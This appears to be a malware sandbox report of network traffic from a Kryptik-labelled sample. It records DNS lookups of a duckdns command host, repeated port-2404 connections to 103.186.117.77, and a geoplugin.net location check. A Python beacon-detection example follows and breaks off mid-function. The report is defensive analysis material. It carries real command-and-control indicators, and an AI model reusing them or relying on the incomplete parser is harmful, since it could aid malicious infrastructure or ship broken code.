Oct 28, 2024 18:37:10.713124990 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.739614010 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.739707947 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.739723921 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.739849091 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.739866018 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.739892006 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.739892006 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.740123987 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.740142107 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.740158081 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.740168095 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.740206957 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.740272045 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.740288973 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.740389109 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.741038084 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.779588938 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.779607058 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.779622078 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.779690981 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.779690981 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.808897972 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.808914900 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.808928967 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.808983088 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.823520899 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.823539972 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.823554993 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.823580980 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.823607922 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.823623896 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.823667049 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.823667049 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.823949099 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.823966026 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.823980093 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.824028969 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.854047060 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.854063034 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.854079962 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.854116917 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.854116917 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.876137972 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.876154900 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.876171112 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.876197100 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.876344919 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.876360893 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.876398087 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.876662970 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.876678944 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.876697063 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.876713037 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.876733065 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.876840115 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.876857042 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.877186060 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.877420902 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.877597094 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.877712011 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.158394098 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.158437014 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.158453941 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.158518076 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.158708096 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.158725977 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.158740997 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.158750057 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.158790112 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.158869982 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.158886909 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.158901930 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.158945084 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.158994913 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159010887 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159040928 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159053087 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.159056902 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159073114 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159085989 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.159117937 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.159363985 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159383059 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159396887 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159517050 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.159634113 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159650087 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159674883 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159687996 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.159696102 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159712076 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159728050 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159729958 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.159744024 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159770012 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.159773111 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159789085 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159805059 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159815073 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.159822941 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.159849882 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.159879923 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.160286903 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160303116 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160317898 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160331964 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160346031 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.160346031 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160387993 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.160537958 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160552979 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160567045 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160578012 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.160620928 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.160638094 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160654068 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160669088 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160685062 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160702944 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.160763025 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160764933 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.160885096 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160901070 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160913944 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.160934925 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.160969019 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.161159992 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.161176920 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.161191940 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.161233902 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:11.161385059 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:11.161401033 CET  2404      49713     103.186.117.77   192.168.2.5
                                                            Oct 28, 2024 18:37:11.161416054 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161442995 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161463022 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161479950 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161479950 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161497116 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161513090 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161547899 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161572933 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161845922 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161859989 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161880970 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161896944 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161897898 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161911964 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161927938 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161942959 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161956072 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161962032 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161978006 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161981106 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.161995888 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.161997080 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.162018061 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.162087917 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.164400101 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.178706884 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178724051 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178739071 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178793907 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.178829908 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.178865910 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178883076 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.178932905 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.179155111 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.179171085 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.179183960 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.179235935 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.182782888 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.182797909 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.182812929 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:11.182842970 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:11.182888031 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:12.536119938 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:12.559039116 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559056044 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559067965 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559225082 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:12.559282064 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559295893 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559309006 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559329033 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559344053 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559354067 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:12.559361935 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.559376001 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590711117 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590821981 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590831995 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590888977 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590898037 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.590905905 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.594918966 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:12.595258951 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:13.108546019 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:13.108922005 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:14.230822086 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:14.261377096 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:14.263391972 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:14.264264107 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:14.295067072 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:15.238370895 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:15.238482952 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:15.248792887 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:15.280731916 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:16.503736973 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:16.503947020 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:16.746793032 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:16.746860981 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:16.828504086 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:37:16.828583956 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:33.036115885 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:33.038512945 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:33.043906927 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:03.035809040 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:03.039587975 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:38:03.044852018 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:33.050894976 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:33.052963972 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:38:33.058461905 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:38:56.981085062 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:38:56.986499071 CET8049714178.237.33.50192.168.2.5
                                                            Oct 28, 2024 18:39:03.065418959 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:39:03.066800117 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:39:03.072308064 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:39:33.065313101 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:39:33.068977118 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:39:33.074764967 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:03.079778910 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:03.084469080 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:40:03.089880943 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:33.085575104 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:33.087038040 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:40:33.433893919 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:40:33.436541080 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:40:33.436589956 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:40:33.464917898 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:41:03.081873894 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:41:03.083440065 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:41:03.328546047 CET240449712103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:41:03.328665018 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:41:03.340125084 CET497122404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:41:03.426088095 CET240449712103.186.117.77192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2024 18:37:03.814304113 CET | 61726 | 53 | 192.168.2.5 | 1.1.1.1
Oct 28, 2024 18:37:04.831513882 CET | 61726 | 53 | 192.168.2.5 | 1.1.1.1
Oct 28, 2024 18:37:05.484589100 CET | 53 | 61726 | 1.1.1.1 | 192.168.2.5
Oct 28, 2024 18:37:07.003534079 CET | 50804 | 53 | 192.168.2.5 | 1.1.1.1
Oct 28, 2024 18:37:07.046437025 CET | 53 | 50804 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 28, 2024 18:37:03.814304113 CET | 192.168.2.5 | 1.1.1.1 | 0xf22 | Standard query (0) | bubemoney7221.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 28, 2024 18:37:04.831513882 CET | 192.168.2.5 | 1.1.1.1 | 0xf22 | Standard query (0) | bubemoney7221.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 28, 2024 18:37:07.003534079 CET | 192.168.2.5 | 1.1.1.1 | 0x54a6 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 28, 2024 18:37:05.484589100 CET | 1.1.1.1 | 192.168.2.5 | 0xf22 | No error (0) | bubemoney7221.duckdns.org | - | 103.186.117.77 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 18:37:07.046437025 CET | 1.1.1.1 | 192.168.2.5 | 0x54a6 | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                            • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49714 | 178.237.33.50 | 80 | 7308 | C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 18:37:14.264264107 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                            Host: geoplugin.net
                                                            Cache-Control: no-cache
Oct 28, 2024 18:37:15.238370895 CET | 1164 | IN | HTTP/1.1 200 OK
                                                            date: Mon, 28 Oct 2024 17:37:15 GMT
                                                            server: Apache
                                                            content-length: 956
                                                            content-type: application/json; charset=utf-8
                                                            cache-control: public, max-age=300
                                                            access-control-allow-origin: *
                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                                            Data Ascii: { "geoplugin_request":"155.94.241.188", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
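The packet tables above run the port and address columns together with no separator, and once the implant has registered on port 2404 the 49712 flow repeats every 30 seconds. The Python below is an added example, not code from the Joe Sandbox report: it takes a subset of those rows (copied from the TCP table above), enumerates every valid reading of the fused columns, keeps the reading whose reverse flow also appears in the capture, and flags flows with a stable inter-packet period. The thresholds (at least 5 packets, 20% jitter, 80% of gaps regular) are this example's own assumptions.

```python
"""Parse fused Joe Sandbox packet rows and flag periodic C2 beaconing.

Added example, not code from the Joe Sandbox report. The rows in ROWS are
copied from the report's TCP packet table; the parser, the scoring and the
beacon heuristic with its thresholds are this example's own.
"""
import re
from collections import Counter
from datetime import datetime, timedelta
from statistics import median

# Rows copied from the report. The export fuses Source Port, Dest Port, Source IP and
# Dest IP: "497122404192.168.2.5103.186.117.77" is 49712 -> 2404, 192.168.2.5 -> 103.186.117.77.
ROWS = """\
Oct 28, 2024 18:37:14.230822086 CET4971480192.168.2.5178.237.33.50
Oct 28, 2024 18:37:14.261377096 CET8049714178.237.33.50192.168.2.5
Oct 28, 2024 18:37:15.248792887 CET497122404192.168.2.5103.186.117.77
Oct 28, 2024 18:37:15.280731916 CET240449712103.186.117.77192.168.2.5
Oct 28, 2024 18:37:33.036115885 CET240449712103.186.117.77192.168.2.5
Oct 28, 2024 18:37:33.038512945 CET497122404192.168.2.5103.186.117.77
Oct 28, 2024 18:38:03.035809040 CET240449712103.186.117.77192.168.2.5
Oct 28, 2024 18:38:03.039587975 CET497122404192.168.2.5103.186.117.77
Oct 28, 2024 18:38:33.050894976 CET240449712103.186.117.77192.168.2.5
Oct 28, 2024 18:38:33.052963972 CET497122404192.168.2.5103.186.117.77
Oct 28, 2024 18:39:03.065418959 CET240449712103.186.117.77192.168.2.5
Oct 28, 2024 18:39:03.066800117 CET497122404192.168.2.5103.186.117.77
Oct 28, 2024 18:39:33.065313101 CET240449712103.186.117.77192.168.2.5
Oct 28, 2024 18:39:33.068977118 CET497122404192.168.2.5103.186.117.77
Oct 28, 2024 18:40:03.079778910 CET240449712103.186.117.77192.168.2.5
Oct 28, 2024 18:40:03.084469080 CET497122404192.168.2.5103.186.117.77
Oct 28, 2024 18:40:33.085575104 CET240449712103.186.117.77192.168.2.5
Oct 28, 2024 18:40:33.087038040 CET497122404192.168.2.5103.186.117.77
"""

ROW_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(?P<frac>\d+) CET(?P<tail>[\d.]+)$")


def _octet_ok(s):
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 255


def _port_ok(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def candidates(tail):
    """Every valid (sport, dport, src_ip, dst_ip) reading of one fused row tail."""
    g = tail.split(".")  # two IPv4 addresses always leave exactly 6 dots
    if len(g) != 7 or not all(_octet_ok(x) for x in (g[1], g[2], g[4], g[5], g[6])):
        return []
    out = []
    for n in (1, 2, 3):  # g[0] = sport + dport + first octet of src IP
        ports, a1 = g[0][:-n], g[0][-n:]
        if not ports or not _octet_ok(a1):
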